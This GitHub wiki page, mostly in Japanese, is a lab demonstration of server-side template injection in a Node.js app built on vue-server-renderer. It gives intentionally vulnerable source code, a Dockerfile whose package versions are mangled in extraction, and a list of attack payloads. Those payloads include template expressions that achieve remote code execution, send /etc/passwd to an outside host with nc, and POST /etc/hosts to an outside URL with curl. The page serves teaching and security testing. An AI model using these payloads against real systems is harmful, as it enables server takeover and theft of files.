SSTI nodejs 05 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード (nodejs vue/vue-server-renderer)

// Web framework plus request-body parsing (JSON and form-encoded bodies).
const express = require('express');
const bodyParser = require('body-parser');

// Templating engine: Vue components rendered to an HTML string on the server.
const Vue = require('vue');
const renderer = require('vue-server-renderer').createRenderer();

const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

const port = 5066;
// Renders the greeting page for `input` and returns it as an HTML string.
//
// SECURITY (the SSTI sink this page demonstrates): `input` is concatenated
// into the template *source* before Vue compiles it, so any template syntax
// in the submitted name ({{ ... }} expressions and the like) is evaluated by
// the renderer instead of being shown as text. The mitigation is to keep the
// template constant and pass the value as component data, e.g.
// `<p>Hello {{ name }}</p>` rendered from
// `new Vue({ template: pre_template, data: { name: input } })`, so that Vue
// treats it as text and HTML-escapes it on output.
//
// input   - the `name` form field; untrusted, arrives as whatever body-parser
//           produced for it (typically a string for a normal form post)
// returns - the rendered HTML, or "" if the render callback has not run by
//           the time the `return` below executes (see note at renderToString)
function getHTML(input){
    // Template source is built by string concatenation; the `+input+` in the
    // <p> is the injection point.
    var pre_template =`<!DOCTYPE html><html><body>
    <form action="/" method="post">
        First name:<br>
    <input type="text" name="name" value="">
    <input type="submit" value="Submit">
    </form><p>Hello `+input+`</p></body></html>`

    // Component built from the attacker-influenced template. This local `app`
    // shadows the module-level express `app` inside this function.
    var app = new Vue({template: pre_template })

    var html= "";
    // The result is delivered through a callback, so `html` is only set if
    // that callback runs before the `return` below. NOTE(review): whether
    // renderToString invokes it synchronously for a plain template is not
    // established here — confirm against the vue-server-renderer version in
    // use; if it is asynchronous this function always returns "" and the
    // `throw err` becomes an uncaught exception instead of reaching the
    // route handler.
    renderer.renderToString(app, (err, result) => {
        if (err) throw err
        html = result;
        })
    // Logs the raw submitted value (payload included) to stdout.
    console.log(input);
    return html;
}
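// POST handler: reads the submitted `name` field and renders the page with it.
//
// `req.param()` is deprecated in Express 4.x (removed in 5) and silently
// merged route params, body and query, so the value is read from the parsed
// form body explicitly. body-parser (registered on `app` above) populates
// `request.body`; the guards keep the original default of "" when the field
// is absent or no body was parsed.
app.post('/', (request, response) => {
    const body = request.body || {};
    const input = body.name == null ? "" : body.name;
    // `input` is untrusted and flows straight into the template source in
    // getHTML — nothing here neutralises it.
    response.send(getHTML(input));
});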
// GET handler: serves the empty form (no name submitted yet, so the greeting
// is blank).
app.get('/', (request, response) => {
    response.send(getHTML(""));
});
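// Start the HTTP server.
//
// Node invokes the listen callback on the 'listening' event with no
// arguments, so the previous `(err) => { if (err) ... }` branch could never
// run; a failed bind (e.g. the port already in use) is delivered as an
// 'error' event on the http.Server that app.listen returns, which is handled
// here with the same log message.
const server = app.listen(port, () => {
    console.log(`server is listening on ${port}`);
});
server.on('error', (err) => {
    console.log('something bad happened', err);
});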
  • Dockerfile
# Base image for the deliberately vulnerable lab. node:6 is an end-of-life
# release line; keep this container off any shared or exposed network.
FROM node:6
# Application sources land in /home. No WORKDIR is set, so the npm installs
# below run in the image's default working directory rather than /home —
# NOTE(review): presumably still resolvable through Node's parent-directory
# module lookup, but `WORKDIR /home` before the RUN lines would make it explicit.
COPY src/ /home
RUN npm install
# NOTE(review): the three package@version specs below were mangled into
# "[email protected]" when the wiki page was extracted; the pinned versions must
# be restored from the original page before this builds. Which packages they
# pinned (vue and vue-server-renderer are the likely ones) cannot be recovered
# from this copy.
RUN npm install [email protected]
RUN npm install [email protected]
RUN npm install [email protected]

攻撃する方法

XSS

#set($xss = '<script>alert(1);</script>') $xss

RCE

{{constructor.constructor("global.process.mainModule.require('child_process').execSync('sleep 5').toString()")()}}

{{constructor.constructor("global.process.mainModule.require('child_process').execSync('cat /etc/passwd | nc 192.168.5.33 7777').toString()")()}}

{{constructor.constructor("global.process.mainModule.require('child_process').execSync('curl -XPOST http://bogus.jp/postaccess.php -d @/etc/hosts').toString()")()}}

参考
